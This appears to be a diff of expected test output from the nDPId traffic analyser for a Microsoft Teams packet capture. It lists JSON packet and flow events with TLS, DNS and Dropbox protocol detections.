00371{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":607,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041677401,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":607,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041677401,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":607,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041677408} 00184{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":607,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041677408}
00820{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1587041677422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1587041677422,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES5AAEARZ+PAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGADtdrMEAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} 00820{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1587041677422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1587041677422,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES5AAEARZ+PAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGADtdrMEAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":617,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041677424,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":617,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041677424,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":617,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041677611} 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":617,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041677611}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041678029,"flow_last_seen":1587041678029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041678029,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041678029,"flow_last_seen":1587041678029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041678029,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1587041678029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041678029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex5Abv0H+uOAAAAALAC\/\/9XkAAAAgQFtAEDAwUBAQgKMISdwwAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1587041678029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041678029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex5Abv0H+uOAAAAALAC\/\/9XkAAAAgQFtAEDAwUBAQgKMISdwwAAAAAEAgAA"}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041678074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8KlZAAGwGoSQ0ck0hwKgBBgG77Hk7ZXhQ9B\/rj6ASIAAz8QAAAgQFoAEDAwgEAggKYRL\/2zCEncM="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041678074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8KlZAAGwGoSQ0ck0hwKgBBgG77Hk7ZXhQ9B\/rj6ASIAAz8QAAAgQFoAEDAwgEAggKYRL\/2zCEncM="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041678074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex5Abv0H+uPO2V4UYAQEAlydQAAAQEICjCEne9hEv\/b"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041678074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex5Abv0H+uPO2V4UYAQEAlydQAAAQEICjCEne9hEv\/b"}
00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041678029,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041678074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041678029,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041678074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":625,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041678029,"flow_last_seen":1587041678120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041678120,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":625,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041678029,"flow_last_seen":1587041678120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041678120,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":644,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041678303,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":644,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041678303,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":644,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041678611} 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":644,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041678611}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679059,"flow_last_seen":1587041679059,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041679059,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679059,"flow_last_seen":1587041679059,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041679059,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1587041679059,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1587041679059,"pkt":"EBMx8Tl2KDc3AG3ICABFAABFmxQAAP8RnTvAqAEGwKgBAfouADUAMTs\/p0sBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1587041679059,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1587041679059,"pkt":"EBMx8Tl2KDc3AG3ICABFAABFmxQAAP8RnTvAqAEGwKgBAfouADUAMTs\/p0sBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="}
00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679059,"flow_last_seen":1587041679059,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041679059,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679059,"flow_last_seen":1587041679059,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041679059,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -77,10 +77,10 @@
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01092{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1587041679280,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"thread_ts_msec":1587041679280,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAIBMegAAEARwq7AqAEGwKgB\/0RcRFwB7bcHeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxMzMzNTg3NDkxMjE4NDQ1MzM1NDE0MzUyMjUyODU2OTU0NjIxMiwgImRpc3BsYXluYW1lIjogIiIsICJuYW1lc3BhY2VzIjogWzI3NTAzNzA1NjAsIDc4NTI2NjE3NywgMTUyNjI2MzA0NSwgMjg1MjE2MDcsIDE0ODE5MzM3LCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCA0MDU2NDYyNTkyLCA3MDUzNjI3MTg0LCAxNTIyMTc3NTg3LCAxNDIxMTE0Mzk5LCAxMjUyMTE2NDI5LCA5OTQ2OTc3MywgNzA3OTYzNjY4OCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNjQ3ODMwMzQ0MCwgNTExNzA2NjQyLCA2Mjk3OTU1MTg0LCAxNDE1NjIwMzUwXX0="} 01092{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1587041679280,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"thread_ts_msec":1587041679280,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAIBMegAAEARwq7AqAEGwKgB\/0RcRFwB7bcHeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxMzMzNTg3NDkxMjE4NDQ1MzM1NDE0MzUyMjUyODU2OTU0NjIxMiwgImRpc3BsYXluYW1lIjogIiIsICJuYW1lc3BhY2VzIjogWzI3NTAzNzA1NjAsIDc4NTI2NjE3NywgMTUyNjI2MzA0NSwgMjg1MjE2MDcsIDE0ODE5MzM3LCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCA0MDU2NDYyNTkyLCA3MDUzNjI3MTg0LCAxNTIyMTc3NTg3LCAxNDIxMTE0Mzk5LCAxMjUyMTE2NDI5LCA5OTQ2OTc3MywgNzA3OTYzNjY4OCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNjQ3ODMwMzQ0MCwgNTExNzA2NjQyLCA2Mjk3OTU1MTg0LCAxNDE1NjIwMzUwXX0="}
00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
00371{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":648,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041679280,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":648,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041679280,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":648,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041679406} 00184{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":648,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041679406}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":649,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041679280,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":649,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041679280,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
